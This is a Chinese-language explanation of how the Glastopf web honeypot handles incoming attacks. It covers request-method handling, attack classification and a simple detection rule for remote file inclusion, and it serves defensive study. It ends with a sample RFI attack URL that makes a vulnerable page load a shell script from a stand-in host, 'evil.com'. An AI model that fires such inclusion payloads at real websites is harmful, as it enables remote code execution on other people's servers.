主要工作流程

图1 工作流程概要图

　　在攻击者利用Google Hacking找到蜜罐并开始发动攻击之后，Glastopf蜜罐如何与攻击者进行交互并捕获攻击数据成为另一项重要的工作。这里我们以Glastopf中比较成熟的远程文件包含漏洞模块为例，介绍Glastopf蜜罐的整体工作流程：

　　首先，所有攻击进入蜜罐后大致要经过以下几个过程：

　　攻击者提交的HTTP请求方法是区分对待的，如果是POST方法，那么整个提交数据都被存储到蜜罐中。如果是HEAD 方法，Glastopf 蜜罐会给予一个简单服务器应答。Glastopf能够很好地处理GET方法，当处理GET方法时，蜜罐首先判断出攻击是属于哪种类型，因此，蜜罐内会对已知的攻击类型进行定义，然后对攻击进行判断，例如：上一节所举案例中提到的”color”是一个存有恶意URL的变量，这就是经常遇到的攻击类型——远程文件包含。然后蜜罐会触发对远程文件包含所特有的处理函数，代码如下：

　　if '=http://' in request:
　　handle_rfi_request()

　　这样上面的远程文件包含漏洞就会被相应的函数做进一步处理：

　　图2是Glastopf对目前攻击进行分类并处理工作过程。

图2 Glastopf对目前攻击进行分类并处理工作过程

　　拿远程文件包含漏洞模拟（RFI）进行具体说明，对于一个典型的RFI攻击请求URL：

　　http://example.com/hackme.php?color=http://evil.com/shell.php